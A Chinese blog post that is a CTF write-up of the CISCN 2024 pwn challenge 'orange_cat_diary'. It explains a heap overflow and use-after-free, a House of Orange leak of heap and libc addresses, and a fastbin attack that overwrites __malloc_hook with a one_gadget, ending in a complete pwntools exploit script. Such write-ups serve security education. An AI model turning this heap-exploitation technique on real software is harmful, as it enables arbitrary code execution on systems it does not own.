2024 cicsn orange_cat_diary

最新推荐文章于 2024-07-12 16:16:27 发布
最新推荐文章于 2024-07-12 16:16:27 发布
阅读量341 收藏 4
点赞数 5
分类专栏: cicsn国赛初复赛 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llovewuzhengzi/article/details/139031304
版权

文章目录

漏洞点

一次free和一次show,可以修改超过创建定义的长度多八个字节,存在edit after free 和show after free。题目提示orange,

思路

  1. house of orange泄露heap地址和libc地址
  2. 然后edit after free直接修改fd,然后控制得到目标地址malloc_hook,往malloc_hook写onegadget即可
    在这里插入图片描述
    show这里输出不会因为零字节而截至,所以可以一次性泄露heap地址和libc地址
__int64 show()
{
  if ( show_1 > 0 )
  {
    fwrite(ptr, 1uLL, length, stdout);
    --show_1;
  }
  puts("Diary view successful.");
  return 0LL;
}

检查

libc2.23 没有检查得到的fastbin中的chunk的size是否对齐,为0x7f也可以得到其中的chunk

#define fastbin_index(sz) \
  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)

if (__glibc_likely (victim != NULL))
	    {
	      size_t victim_idx = fastbin_index (chunksize (victim));
	      if (__builtin_expect (victim_idx != idx, 0))
		malloc_printerr ("malloc(): memory corruption (fast)");
	      check_remalloced_chunk (av, victim, nb);
	         void *p = chunk2mem (victim);
	      alloc_perturb (p, bytes);
	      return p;
	    }

exp

from pwn import *
p=process("./pwn")
libc=ELF("./libc-2.23.so")
context(log_level="debug")

def add(length,content):
    p.sendlineafter(b"Please input your choice:",b"1")
    p.sendafter(b"content:",str(length))
    p.sendafter(b"Please enter the diary content:\n",content)

def dele():
    p.sendlineafter(b"Please input your choice:",b"3")
def edit(length,content):
    p.sendlineafter(b"Please input your choice:",b"4")
    p.sendafter(b"Please input the length of the diary content:",str(length))
    p.sendafter(b"Please enter the diary content:\n",content)
def show():
    p.sendlineafter(b"Please input your choice:",b"2")
  

p.sendlineafter(b"Please tell me your name.\n",b"llk")


add(0x18,"12345678")
edit(0x20,0x18*b"1"+p64(0xfe1))

add(0xff0,"12345678")
add(0x60,"12345678")# 泄露堆地址heap

show()
p.recv(8)
libc.address=(int.from_bytes(p.recv(8),byteorder="little"))-1632-0x1d3c80-0x1f0ea8
print("libc",hex(libc.address))
heap=int.from_bytes(p.recv(8),byteorder="little")
print("heap",hex(heap))

print("malloc_hook",hex(libc.sym['__malloc_hook']))
add(0x60,"12345678")
dele()
payload = p64(libc.sym['__malloc_hook']-0x23)
edit(0x60,payload)



add(0x60,"12345678")
add(0x60,b'a' * 0x13 + p64(libc.address + 0xf03a4))
gdb.attach(p)
pause()
p.sendlineafter(b"Please input your choice:",b"1")
p.sendafter(b"content:",str(0x60))
#最后发生长度就行,不然还是按照add的话会因为after阻塞
p.interactive()
看星猩的柴狗
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Orange_Pi_PC安装Armbian并启用默认桌面
Milotic
07-01 2万+
实验基本条件:Orange_Pi_PC *1参考资料:http://www.orangepi.cn/orangepipc/index_cn.html7英寸TFT液晶显示屏参考资料:https://www.aliexpress.com/item/7inch-TFT-LCD-Screen-for-Orange-Pi-H3-chip-Boards/32831758014.htmlArmbian Xeni...
orange_detection_android
05-26
orange_detection_android 适用安卓API,api版本>=19 使用指南 将文中的服务器地址改为您的服务器,并打开对应端口,即可将程序部署于您的服务器上 Author: Yihang Zhu
【PWN · House_Of_Orange | fastbin-attack】[CISCN 2024 初赛] orange_cat_diary
Mr_Fmnwon的博客
05-19 1153
审计一下题目:经典菜单,edit,show,add,delete俱全嗯,啧啧,delete还有个UAF太明显,爽爽unsortedbin-leak-libc!——what!show只能一次,delete只能一次!!!救命。。。我该怎么做。比较惊险,磨了半天,学习house of orange然后利用,居然真的过了。那一刻的高兴至今难忘。
OrangePi_Kunpeng_Pro开发板测验——性能巨人
屿小夏.的知识博客
05-29 3万+
在当下这个全球互联的时代,高性能单板计算机正逐渐崭露头角,成为推动创新和个性化解决方案的关键力量。其中,香橙派 Kunpeng Pro作为一款集成了华为鲲鹏处理器的板卡,凭借其卓越的计算性能和广泛的应用潜力,已经吸引了全球开发者与技术爱好者的目光。它不仅为高性能服务器、人工智能和边缘计算等领域注入了新的活力,还以其对开发者友好的接口布局和广泛的软件支持,成为了DIY项目与复杂计算任务的理想选择。
Orange_Pi_PC在armbian下安装远程桌面tightvnc
Milotic
07-01 8071
首先确保armbian已经有桌面,如果没有桌面程序,则需要先安装配置桌面,如有桌面则运行 sudo apt install tightvncserver安装xrdpsudo apt install xrdp打开Windows远程工具,或运行mstsc输入目标IP地址即可连上输入用户名和密码就可以使用了。...
unordered_map详细介绍
lizhengze1117的博客
07-21 5万+
转载自关联容器:unordered_map详细介绍(附可运行代码) 介绍 1 特性 2 Hashtable和bucket 模版 1 迭代器 功能函数 1 构造函数 12示例代码 2 容量操作 21 size 22 empty 3 元素操作 31 find 32 insert 33 at 34 erase 35 clear 36 swap 37 示例代码 4 迭代器和...
python orange3_anaconda安装orange过程(data mining framework,支持python语言)
weixin_39929683的博客
12-06 2104
1、conda create -n orange3 python=3.5 创建一个环境2、activate orange3 激活orange环境3、conda config --add channels conda-forge4、(1)conda install orange3或者(2)pip install orange3如果上面两种方法由于网络问题老是出现Readtime out 的情况,可以...
【机器视觉】 dev_disp_text算子
C/C++软件工程师、嵌入式软件工程师、物联网研发工程师、C/C++讲师、物联网讲师、嵌入式讲师---欢迎大家一起交流(私信添加博主微信)
06-17 4382
00. 目录 文章目录00. 目录01. 概述02. 签名03. 描述04. 注意05. 参数06. 结果07. 附录 01. 概述 dev_disp_text — 在当前图形窗口中显示文本。 02. 签名 dev_disp_text( : : String, CoordSystem, Row, Column, Color, GenParamName, GenParamValue : ) 03. 描述 dev_disp_text 在当前图形窗口的位置 (Row,Column) 显示文本。 如果只定义了一个位
std:;remove_if用法讲解
KFLING的博客
05-03 4万+
remove_if(begin,end,op); remove_if的参数是迭代器,前两个参数表示迭代的起始位置和这个起始位置所对应的停止位置。最后一个参数:传入一个回调函数,如果回调函数返回为真,则将当前所指向的参数移到尾部。返回值是被移动区域的首个元素。remove_if在头文件algorithm中,故要使用此函数,需添加#include <algorithm>由于remove_...
简述C++中map和unordered_map的用法
热门推荐
JingYi的专栏
09-11 7万+
1. 简介 map和unordered_map都是c++中可以充当字典(key-value)来用的数据类型,但是其基本实现是不一样的。 2. map 对于map的底层原理,是通过红黑树(一种非严格意义上的平衡二叉树)来实现的,因此map内部所有的数据都是有序的,map的查询、插入、删除操作的时间复杂度都是O(logn)。此外,map的key需要定义operator <,对于一般的数据类...
python MySQLdb 如何设置读超时read_timeout
翔云
07-28 7059
在python中,经常用到 MySQLdb操作MySQL数据库。 在实现上,MySQLdb并不是纯python的,而是封装了MySQL C API库_mysql。 对于MySQLdb是否支持read_timeout,其使用手册中对这个参数只字未提。所以,read_timeout是否真的可用,是存在疑惑的。stack overflow上面也有人问到同样的问题。 接下来,我们从MySQLdb的源码库M...
orange_market
05-19
11. SEO优化:为了提高"orange_market"在搜索引擎中的可见性,需要遵循SEO最佳实践,比如合理使用关键词、添加meta标签、优化图像大小和速度等。 12. Accessibility(可访问性):确保网站对所有用户,包括残障人士...
Joomla orange_box
12-24
【Joomla orange_box】是一款专为Joomla内容管理系统设计的网页模板,它的出现旨在为网站开发者提供一个富有吸引力且功能丰富的界面设计。Joomla作为一款开源的PHP框架,被广泛用于构建动态网站和内容管理平台,而...
ORANGE_PI-ZERO-V1_1.pdf
05-01
《香橙派Zero——一款全能型的开源单板电脑》 香橙派Zero是一款小巧而强大的开源单板电脑,以其灵活的应用性和丰富的功能在嵌入式系统领域内备受青睐。这款设备采用全志H2系统级芯片,搭载256MB或512MB DDR3内存,...
Orange_0.0.5数据挖掘软件下载
06-07
Orange 由斯洛文尼亚大学计算与信息学系的生物信息实验室 BioLab 进行开发,是一款免费开源的数据挖掘软件,可在官网下载,支持 Windows, Linux 和 MacOS。 Orange 由 C++ 和 Python 开发,包含了一系列的可视化...
cv2读取和保存图片
最新发布
m0_53291740的博客
07-12 105
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 744
在Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 661
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
OrangePi_zero_H2_用户手册_v0.1.pdf
05-01
"OrangePi_zero_H2_用户手册_v0.1.pdf 是一份详尽的指南,涵盖了Orange Pi Zero H2这款开源单板电脑的各个方面。手册由深圳市迅龙软件有限公司出版,提供从基础特性到高级应用的全面介绍。Orange Pi Zero H2采用全志...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

看星猩的柴狗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值